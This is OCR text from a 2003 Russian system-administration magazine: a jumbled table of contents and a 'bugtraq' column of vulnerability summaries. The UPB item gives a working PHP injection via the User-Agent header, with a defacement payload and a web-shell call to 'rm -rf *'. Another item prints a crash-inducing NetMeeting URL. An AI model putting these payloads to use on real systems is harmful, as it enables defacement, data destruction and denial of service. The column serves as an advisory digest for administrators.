№6(7) июнь 2003
подписной индекс 81655
журнал для cистемных администраторов,
вебмастеров и программистов
Введение в OpenBSD
Скрипты для
подсчета трафика:
реализация в FreeBSD
Использование IPSec
в Windows 200x
Контрольная сумма
на защите
Linux/FreeBSD
Создание
загрузочных дискет
и CD-дисков Linux
оглавление
АДМИНИСТРИРОВАНИЕ
Виртуальный компьютер
Денис Колисниченко
dhsilabs@mail.ru
Статическая маршрутизация
в Linux. <...> iproute2
Часть2
Всеволод Стахов
CEBKA@smtp.ru
БЕЗОПАСНОСТЬ
4
Введение в OpenBSD
Денис Назаров
pheonix@sysattack.com
Учет трафика с помощью программ
MRTG и LAN Billing
Денис Колисниченко
dhsilabs@mail.ru
14
Скрипты для подсчета трафика:
пример реализации в FreeBSD
Денис Пеплин
info@volginfo.ru
20
№6(7), июнь 2003
70
Виктор Игнатьев
n4vy@nm.ru
78
26 Глубоководное погружение
в чипсет Intel 875P
Крис Касперски
kk@sendmail.ru
82
36 СЕТИ
Дальняя связь. <...> Как это бывает
44
Использование IPSec в Windows 200x
Максим Костышин
Maxim_kostyshin@mail.ru
Сергей Яремчук
grinder@ua.fm
HARDWARE
Создание загрузочных дискет
и CD-дисков Linux
Всеволод Стахов
CEBKA@smtp.ru
Контрольная сумма на защите
Linux/FreeBSD
Перехват Shell через YaBB
Ipfw и управление трафиком в FreeBSD
Игорь Чубин
imchubin@mail.ru
64
Денис Еланский
grosm@samag.ru
BUGTRAQ
90
2, 13, 19, 35, 43, 77
52
1
bugtraq
Удаленное выполнение произвольного
PHP-кода через HTTP-заголовок
User-Agent в Ultimate PHP Board
Уязвимость обнаружена в Ultimate PHP Board (UPB). <...> Отказ в обслуживании, удаленное
переполнение буфера и XSS в Microsoft
Internet Information Service 4.0-5.1 (патч)
Microsoft выпустила обновление для IIS 4.0-5.0, которое устраняет все ранее обнаруженные уязвимости в IIS 4.0-5.0,
выпущенные после Windows NT 4.0 Service Pack 6a для IIS
4.0 и Windows 2000 Service Pack 2 для IIS 5.0 и IIS 5.1. <...> Переполнение буфера в IIS 5.0 связано с недостаточной проверкой запросов для некоторых типов веб-страниц,
таких как SSI (server side includes). <...> Если атакующий впоследствии запросит эту страницу, произойдет переполнение буфера, позволяющее выполнить произвольный
код на сервере с пользовательскими привилегиями. <...> Demarc PureSecure ракрывает пароли
к базе данных локальному
пользователю <...>
Системный_администратор_№6_2003.pdf
№6(7) июнь 2003
подписной индекс 81655
журнал для cистемных администраторов,
вебмастеров и программистов
Введение в OpenBSD
Скрипты для
подсчета трафика:
в Windows 200x
Linux/FreeBSD
Создание
реализация в FreeBSD
Использование IPSec
Контрольная сумма
на защите
загрузочных дискет
и CD-дисков Linux
Стр.1
bugtraq
Удаленное выполнение произвольного
PHP-кода через HTTP-заголовок
User-Agent в Ultimate PHP Board
Уязвимость обнаружена в Ultimate PHP Board (UPB). Удаленный
пользователь может выполнить произвольный PHPкод
на системе как UPB-администратор.
F0KP сообщает, что в этом форуме присутствует серьезная
уязвимость, которая позволяет атакующему выполнять
произвольный PHP-код. UPB протоколирует некоторую
информацию о посетителях (такую, как REMOTE_ADDR и
HTTP_USER_AGENT) в текстовый файл в директории `db',
который называется `iplog'.
Затем в панели администратора администратор форума
может вызвать admin_iplog.php, который просто подключает
`iplog'. Например:
e@some_host$ telnet hostname 80
Connected to hostname at 80
GET /board/index.php HTTP/1.0
User-Agent: phpinfo(); ?>
Когда администратор вызовет admin_iplog.php, ваш код
PHP будет выполнен.
Пример:
1.
system( "echo \'hacked\' > ../index.html" ); ?>
дефейсит главную страницу форума.
2. Создаст tcsh.php с правами httpd в корневой директории
веб-сайта. Затем вам просто нужно будет зайти на
http://hostname/tcsh.php?cmd=rm -rf *
После внедрения кода через поле User-Agent вам нужно
подождать, пока администратор посмотрит admin_iplog.php.
Уязвимость обнаружена в Ultimate PHP Board 1.9.
Отказ в обслуживании, удаленное
переполнение буфера и XSS в Microsoft
Internet Information Service 4.0-5.1 (патч)
Microsoft выпустила обновление для IIS 4.0-5.0, которое устраняет
все ранее обнаруженные уязвимости в IIS 4.0-5.0,
выпущенные после Windows NT 4.0 Service Pack 6a для IIS
4.0 и Windows 2000 Service Pack 2 для IIS 5.0 и IIS 5.1. Также
патч устраняет четыре новые, недавно обнаруженные уязвимости,
которые могут использоваться удаленным атакующим
для XXS-нападения, DoS-атаки и выполнения произвольного
кода на целевой системе.
1. Уязвимость Cross-Site Scripting обнаружена в механизме
отображения сообщений об ошибках при переадресации
запрашиваемого URL в IIS 4.0, 5.0 и 5.1. Атакующий может
сконструировать злонамеренную ссылку, содержащую произвольный
код сценария, который будет выполнен в браузере
пользователя, кликнувшего на эту ссылку в контексте
уязвимого сайта.
2. Переполнение буфера в IIS 5.0 связано с недостаточной
проверкой запросов для некоторых типов веб-страниц,
таких как SSI (server side includes). Для успешной эксплуатации
уязвимости атакующий должен быть способен загрузить
SSI-страницу на уязвимый IIS веб-сервер. Если атакующий
впоследствии запросит эту страницу, произойдет переполнение
буфера, позволяющее выполнить произвольный
код на сервере с пользовательскими привилегиями.
2
3. Отказ в обслуживании связан с неправильным распределением
памяти в IIS 4.0-5.0 при построении заголовков,
которые будут возвращены веб-клиенту. Атакующий
должен быть способен загрузить ASP-страницу на уязвимый
IIS-сервер. Если атакующий впоследствии запросит
ASP-страницу, которая возвращает чрезвычайно большой
заголовок запрашиваемому веб-клиенту, IIS не ограничит
объем выделяемой памяти для этого запроса, в результате
работа сервера может аварийно завершиться вследствие
исчерпания доступной памяти на системе.
4. Отказ в обслуживании связан с неправильной обработкой
чрезмерно длинных WebDAV-запросов, переданных
к IIS 5.0 и 5.1. В результате работа IIS аварийно завершится
и сервер будет перезапущен автоматически
после аварии. Этот патч требует предварительно установленный
патч MS02-050. Уязвимость происходит, когда
клиент получает запрос более 49,153 байт, используя
метод 'PROPFIND' или 'SEARCH'.
Уязвимость обнаружена в Internet Information Service
4.0-5.1.
Чрезмерно длинный запрос NetMeeting
URL приводит к аварийному завершению
работы Windows-систем
Отказ в обслуживании обнаружен в операционных системах
Microsoft Windows 2000 и XP в обработке NetMeeting
URL. Удаленный пользователь может сконструировать
URL, который при загрузке аварийно завершит работу
операционной системы.
Сообщается, что злонамеренный NetMeeting CallTo
URL (callto:msils) может вызвать 'Kmode'-исключение.
Пример:
callto:msils/
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA+type=directory
Уязвимость подтверждена на системах Windows 2000
SP3 и Windows XP Pro.
Demarc PureSecure ракрывает пароли
к базе данных локальному
пользователю
Уязвимость обнаружена в Demarc PureSecure. Сервер
хранит пароли для входа на сервер в открытом виде в
файле на системе.
Сообщается, что пароли базы данных и другая информация
доступа для входа на сервер хранится в незашифрованном
виде. Локальный пользователь может просмотреть
эту информацию и затем получить доступ к удаленной
базе данных.
Уязвимость обнаружена в Demarc PureSecure 1.6.
Составил Александр Антипов
Стр.4